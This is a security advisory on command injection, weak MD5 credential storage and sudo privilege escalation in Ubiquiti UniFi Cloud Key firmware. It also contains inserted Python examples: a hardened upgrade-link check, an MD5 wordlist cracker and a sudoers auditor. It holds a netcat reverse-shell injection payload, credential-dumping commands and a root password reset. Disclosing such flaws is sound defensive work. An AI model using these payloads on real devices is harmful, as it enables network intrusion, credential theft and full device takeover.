Ubiquiti Networks UniFi Cloud Key Command Injection / Privilege Escalation
Posted Jul 27, 2017
Authored by T. Weber | Site sec-consult.com

Ubiquiti Networks UniFi Cloud Key with firmware versions 0.5.9 and 0.6.0 suffer from weak crypto, privilege escalation, and command injection vulnerabilities.

tags | exploit, cryptography, vulnerability
SHA-256 | ff7df61d3c20ef698eeacd98caa047a8dc5114df5d8ba8103bd56c8c1fd454e9

SEC Consult Vulnerability Lab Security Advisory < 20170727-0 >
=======================================================================
title: Authenticated Command Injection &
Cloud User Weak Crypto & Privilege Escalation
product: Ubiquiti Networks UniFi Cloud Key
vulnerable version: Firmware v0.5.9/0.6.0
fixed version: Firmware v0.6.1
CVE number:
impact: Critical
homepage: https://www.ubnt.com
found: 2017-01-31
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:
------------------------
SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Authenticated Command Injection & Cloud User Weak Crypto
The manual UniFi Cloud Key firmware upgrade function is prone to a command
injection vulnerability. It can be exploited, for example, by sending a
manipulated upgrade link to a victim who then pastes it into the upgrade
window.

A reverse shell can be used to get access to the device, which in turn gives
an attacker access to the internal network of the attacked user. The web
user is "www-data", which has only limited access and execution rights, but
by exploiting vulnerability 2) it is possible to gain root access on the
device!

After a successful command injection the cloud user account password hash
can be dumped. Since the UniFi Cloud Key has to communicate with the access
points and configure their passwords as well, the hash has to be stored
somewhere other than /etc/shadow so that the credentials can be pushed to the
devices. These hashes are stored in "system.cfg" using only the MD5 hashing
algorithm, which can be cracked easily in reasonable time.

This configuration file contains the username and the password hash of the
cloud user, which is the same on all access points and on the UniFi Cloud Key.

The configuration file can be read by the user "www-data". Afterwards the
hash can be cracked and the cloud user hijacked. An attacker can then
remotely reconfigure the user's wireless LAN.

2) Privilege Escalation
The password of the root user can be changed by a lower privileged user on
the device. This is possible because some binaries can be executed with sudo
by this user without entering any password (NOPASSWD).


Proof of concept:
-----------------
1) Authenticated Command Injection & Cloud-User Hash Leak
The following PHP snippet is responsible for the command execution:

(api.inc, line 476)
-------------------------------------------------------------------------------
// $url is the user-supplied upgrade link; it is concatenated into the shell
// command line without escaping, so ';' and other metacharacters are live.
exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc);
return CMD_WGET . $url . CMD_WGET_OPTIONS;
}
[...]
-------------------------------------------------------------------------------

The following "link" opens a reverse shell when entered as the upgrade URL:
;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash;

To 'hide' the command from the user in the upgrade window, the link can also
be decorated with a plausible-looking URL:
;busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin

On the attacker's side, netcat was used as the listener:
$ nc -lvp <Attacker-Port>
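The following is an added example, not code from the advisory or from Ubiquiti. It reproduces the unsafe string concatenation pattern quoted from api.inc in Python, shows the separate commands the shell ends up running for the decorated link above, and puts a hardened replacement next to it that validates the link and calls wget without a shell. The values of CMD_WGET and CMD_WGET_OPTIONS, the output path and the function names are assumptions; the example URL is constructed.

```python
"""Added example, not code from the advisory or from Ubiquiti: it reproduces
the unsafe string concatenation pattern from api.inc and shows a hardened
replacement. CMD_WGET / CMD_WGET_OPTIONS values, the output path and the
function names are assumptions."""
import re
from urllib.parse import urlsplit

# Assumed stand-ins for the constants in api.inc; only their shape matters.
CMD_WGET = "wget -O /tmp/fwupdate.bin "
CMD_WGET_OPTIONS = " 2>&1"

# The 'decorated' link from the advisory, exactly as a victim would paste it.
ADVISORY_PAYLOAD = (
    ";busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin"
)

# Characters that give the shell something to do besides passing a URL to wget.
SHELL_META = re.compile(r"""[;&|`$<>\s'"\\(){}]""")


def vulnerable_command(url: str) -> str:
    """Mirror of what exec() receives in the vulnerable code: the untrusted
    upgrade link is spliced verbatim into a string that /bin/sh -c parses."""
    return CMD_WGET + url + CMD_WGET_OPTIONS


def injected_commands(cmd: str) -> list[str]:
    """Split on ';' to show which separate commands the shell will run.
    Simplified: ignores quoting, which the advisory payload does not use."""
    return [part.strip() for part in cmd.split(";") if part.strip()]


def safe_wget_argv(url: str) -> list[str]:
    """Hardened replacement: validate the link as an https URL, reject shell
    metacharacters, and hand it to wget as a single argv element so no shell
    is ever involved (subprocess.run(argv) here; pcntl_exec or escapeshellarg
    in PHP)."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"refusing upgrade link with scheme {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("upgrade link has no host")
    if SHELL_META.search(url):
        raise ValueError("upgrade link contains shell metacharacters")
    return ["wget", "-O", "/tmp/fwupdate.bin", "--", url]


if __name__ == "__main__":
    print(vulnerable_command(ADVISORY_PAYLOAD))
    for cmd in injected_commands(vulnerable_command(ADVISORY_PAYLOAD)):
        print("  sh would run:", cmd)
    print(safe_wget_argv("https://updates.example.com/cloudkey-0.6.1.bin"))
    try:
        safe_wget_argv(ADVISORY_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The argv form is what actually removes the injection; the metacharacter check is belt and braces so that a rejected link is logged rather than silently passed on. Whether the upgrade function should fetch an arbitrary attacker-chosen URL at all (firmware signature verification) is a separate question the advisory does not address.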


To hijack the cloud account, steal the username and password hash from the
per-AP configuration:
(user: www-data)
$ cd /srv/unifi/data/devices/uap/
$ ls
<serial-number-of-an-ap>
$ cd <serial-number-of-an-ap>
$ cat system.cfg | grep "users\.1\.name"
users.1.name=<username>
$ cat system.cfg | grep "users\.1\.password"
users.1.password=<password-hash>

The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg
the same password is only MD5 hashed and can therefore be cracked easily in
reasonable time.
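As an added example (not part of the advisory, and not Ubiquiti's code), the following script does the two steps described above offline: it pulls the users.N.name / users.N.password pairs out of a system.cfg and runs a wordlist attack against the MD5 hash. The config excerpt and the wordlist are constructed; the example assumes the hash is an unsalted hex MD5 as the advisory describes it, and if a device stores a salted variant the cracking step would need the matching algorithm.

```python
"""Added example, not code from the advisory or from Ubiquiti: pull the
users.N.name / users.N.password pairs out of a system.cfg and run a
wordlist attack against the MD5 hash. The config text and wordlist are
constructed; the hash is assumed to be an unsalted hex MD5, as the advisory
describes it."""
import hashlib
import re
from typing import Dict, List, Optional, Tuple

# Constructed excerpt of /srv/unifi/data/devices/uap/<serial>/system.cfg;
# the hash is MD5("password"), matching the advisory's example password.
SAMPLE_SYSTEM_CFG = """\
users.status=enabled
users.1.status=enabled
users.1.name=cloudadmin
users.1.password=5f4dcc3b5aa765d61d8327deb882cf99
"""

# Constructed wordlist; a real attempt would feed a full dictionary plus rules.
SAMPLE_WORDLIST = ["ubnt", "admin", "unifi", "password", "cloudkey"]

USER_LINE = re.compile(r"^users\.(\d+)\.(name|password)=(.*)$")
HEX_MD5 = re.compile(r"^[0-9a-fA-F]{32}$")


def extract_users(cfg_text: str) -> Dict[int, Dict[str, str]]:
    """Group users.N.name and users.N.password values by their index N."""
    users: Dict[int, Dict[str, str]] = {}
    for line in cfg_text.splitlines():
        m = USER_LINE.match(line.strip())
        if m:
            users.setdefault(int(m.group(1)), {})[m.group(2)] = m.group(3)
    return users


def crack_md5(hex_digest: str, wordlist: List[str]) -> Optional[str]:
    """Unsalted MD5 has no work factor: one hashlib call per candidate, which
    is why a dictionary attack on such a hash finishes in seconds."""
    if not HEX_MD5.match(hex_digest):
        raise ValueError("not a 32-hex-digit MD5 digest: " + hex_digest)
    target = hex_digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def hijack_candidates(cfg_text: str, wordlist: List[str]) -> List[Tuple[str, str]]:
    """Return (username, cleartext) for every user whose hash falls to the list."""
    found: List[Tuple[str, str]] = []
    users = extract_users(cfg_text)
    for idx in sorted(users):
        entry = users[idx]
        if "name" in entry and "password" in entry:
            cleartext = crack_md5(entry["password"], wordlist)
            if cleartext is not None:
                found.append((entry["name"], cleartext))
    return found


if __name__ == "__main__":
    for name, pw in hijack_candidates(SAMPLE_SYSTEM_CFG, SAMPLE_WORDLIST):
        print(f"cloud user {name!r} uses password {pw!r}")
```

The same hash is replicated to every access point the Cloud Key manages, so one readable system.cfg anywhere in the fleet is enough; the defensive fix is on the storage side (a salted, slow password hash), not on the wordlist side.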


2) Privilege Escalation
Because of the following line in /etc/sudoers.d/cloudkey-webui, www-data can
elevate its rights to root:

(cloudkey-webui, line 1)
-------------------------------------------------------------------------------
www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service unifi *, /usr/bin/java
-------------------------------------------------------------------------------

With the following commands one can change the root password without
knowing the current one (ubnt-systool chpasswd reads "user:password" pairs
from standard input and runs as root via sudo):
(user: www-data)
$ cd /tmp
$ echo "root:password" > newfile.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt

The root password is now changed to 'password'.
SSH login is also possible:
$ ssh root@<IP-Address>
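To find this class of misconfiguration before an attacker does, here is an added example (not from the advisory) that audits sudoers entries for the pattern above: NOPASSWD rules whose command has no argument restriction, carries a wildcard, or names a binary that hands the caller arbitrary code execution once it runs as root. The quoted cloudkey-webui line is embedded as constructed input next to a tighter variant; the table of escape-capable binaries is the example's own, and the entry for /sbin/ubnt-systool reflects the chpasswd behaviour the advisory demonstrates.

```python
"""Added example, not part of the advisory: audit sudoers entries for the
pattern that made the escalation possible. The parser handles the
'user HOST=(runas) TAG: cmd, cmd' shape used in /etc/sudoers.d files; the
KNOWN_ESCAPES table is the example's own, not something the advisory lists."""
import re
from typing import Dict, List

# Constructed copy of the line quoted in the advisory, joined onto one line.
CLOUDKEY_WEBUI_SUDOERS = (
    "www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, "
    "/usr/sbin/service unifi *, /usr/bin/java\n"
)

# Constructed tighter variant: one fixed command line, nothing else.
SAFER_SUDOERS = "www-data ALL=NOPASSWD:/usr/sbin/service unifi restart\n"

# Binaries that give the caller root code execution or a root-level write.
KNOWN_ESCAPES: Dict[str, str] = {
    "/sbin/ubnt-systool": "chpasswd subcommand resets any password (advisory PoC)",
    "/usr/bin/apt-get": "apt-get runs caller-supplied hooks via -o APT::Update::Pre-Invoke",
    "/usr/bin/java": "java -jar executes any caller-supplied archive as root",
}

SUDOERS_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Return one finding per command spec that lets the user escape the
    intended restriction. Comments, blank lines and Defaults are skipped."""
    findings: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_LINE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for spec in m.group("cmds").split(","):
            parts = spec.split()
            if not parts:
                continue
            binary, args = parts[0], parts[1:]
            reasons: List[str] = []
            if binary == "ALL":
                reasons.append("any command")
            elif not args:
                # sudoers: a command listed without arguments may be run with any
                reasons.append("no argument restriction: caller chooses arguments")
            if any("*" in a for a in args):
                # sudoers wildcards in arguments also match across whitespace
                reasons.append("wildcard argument: '*' matches across whitespace")
            if binary in KNOWN_ESCAPES:
                reasons.append(KNOWN_ESCAPES[binary])
            if reasons:
                findings.append({
                    "user": m.group("user"),
                    "binary": binary,
                    "args": args,
                    "nopasswd": nopasswd,
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(CLOUDKEY_WEBUI_SUDOERS):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"{f['user']} -> {f['binary']} {' '.join(f['args'])} [{tag}]")
        for r in f["reasons"]:
            print("    -", r)
    print("safer variant findings:", audit_sudoers(SAFER_SUDOERS))
```

Run it against `sudo -l -U www-data` output or the files under /etc/sudoers.d on any appliance that runs a web UI as an unprivileged user; every hit is a candidate for the same one-line root takeover shown above, and the fix is to pin each entry to a complete command line that does nothing the web UI does not need.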


Vulnerable / tested versions:
-----------------------------
Ubiquiti Networks UniFi Cloud Key firmware versions 0.5.9 and 0.6.0 have
been tested. These were the latest versions at the time the security
vulnerabilities were discovered.


Vendor contact timeline:
------------------------
2017-02-03: Contacting vendor via HackerOne.
2017-02-05: Providing PoC video via HackerOne.
2017-02-06: Vendor sets status to "Triaged".
2017-02-21: Asking for a status update; No answer.
2017-03-01: Inform the vendor that the advisory will be published at
2017-03-27; No answer.
2017-03-17: Asking for a status update.
2017-03-20: Vendor states that fix will be available in v0.6.1.
2017-03-21: Asking vendor when the update will be available. Found
update on vendor homepage (available since 2017-03-20).
2017-03-21: Vendor asks for more time. Set release date to 2017-06-25.
2017-03-27: Fixed version is available - provide at least 90 days for
customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date
to 2017-06-27.
2017-06-26: Shifted publication date back to 2017-07-27 to provide more
time for customers to apply the patch.
2017-07-27: Public release of security advisory

Solution:
---------
Upgrade to firmware v0.6.1 or later.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab


About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017
